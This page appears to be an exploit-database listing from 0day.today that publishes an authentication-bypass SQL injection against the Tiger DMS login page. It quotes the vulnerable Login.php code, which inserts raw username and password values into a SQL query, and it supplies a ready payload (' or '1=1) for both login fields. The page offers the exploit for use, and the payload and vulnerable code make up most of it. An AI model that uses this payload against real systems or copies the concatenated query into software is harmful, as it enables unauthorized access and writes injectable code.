[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Tiger DMS (Auth Bypass) Remote SQL Injection Vulnerability

Author
ThE g0bL!N
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5120
Category
web applications
Date add
28-04-2009
Platform
unsorted
==========================================================
Tiger DMS (Auth Bypass) Remote SQL Injection Vulnerability
==========================================================


-------------------------------------[+]
Home:http://www.tigerdms.com/download.php
Product: Tiger DMS   
home:www.h4ckf0ru.com
Note:  I test it On Localhost Because ThE Demo is not Worked :)

-------------------------------------
Tiger DMS (auth Bypass) SQL Injection Vulnerabilities
-------------------------------------
File:
-----
Login.php


Vuln:
----
if (isset($r_username)){
$selog = mysql_query("SELECT * FROM $prefix"."users where username='$r_username' and password='$r_password'");
$num_rows = mysql_num_rows($selog);
    if ($num_rows == 1){
    $nona=mysql_fetch_array($selog);
    $_SESSION["aut"] = $nona["type"] ;
    $_SESSION["nick"] = $nona["username"];
    $_SESSION["name"] = $nona["name"];
    $_SESSION["id"] = $nona["id"];
    header("Location: index.php");

exploit:
--------

http://localhost/[path]/login.php

username:' or '1=1

Password:' or '1=1


--------------------------------------------------



#  0day.today [2024-11-16]  #